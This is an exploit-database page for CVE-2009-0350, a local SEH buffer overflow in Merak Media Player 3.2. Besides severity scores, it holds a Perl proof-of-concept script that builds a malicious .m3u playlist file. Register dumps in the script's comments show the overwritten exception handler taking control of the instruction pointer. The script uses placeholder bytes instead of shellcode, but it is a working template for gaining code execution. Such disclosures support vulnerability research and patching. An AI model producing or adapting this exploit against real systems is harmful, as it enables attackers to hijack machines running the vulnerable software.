Merak Media Player 3.2 m3u file Local Buffer Overflow PoC

2009.01.31
Credit: Houssamix
Risk: High
Local: Yes
Remote: No
CVE: CVE-2009-0350
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl -w # Author : Houssamix # Merak Media Player V3.2 m3u file Local Buffer overflow (SEH) # Download : http://www.qwerks.com/download/3748/merak.zip # -------------------------------------------- # EAX 00000000 # ECX 45454545 # EDX 7C9137D8 ntdll.7C9137D8 # EBX 00000000 # ESP 0013F784 # EBP 0013F7A4 # ESI 00000000 # EDI 00000000 # EIP 45454545 # 0013FBE4 42424242 Pointer to next SEH record # 0013FBE8 45454545 SE handler # --------------------------------------------- print "===================================================================== \n"; print "Author : Houssamix \n"; print "===================================================================== \n"; print "Merak Media Player V3.2 m3u file Local Buffer overflow (SEH) \n"; print "===================================================================== \n"; my $buf = "\x42" x 78; my $seh = "\x45\x45\x45\x45"; my $buff = "\x43" x 1120; my $file="hsmx.m3u"; $exploit = $buf.$seh.$buff; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $exploit ; close($FILE); print "$file has been created \n";


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top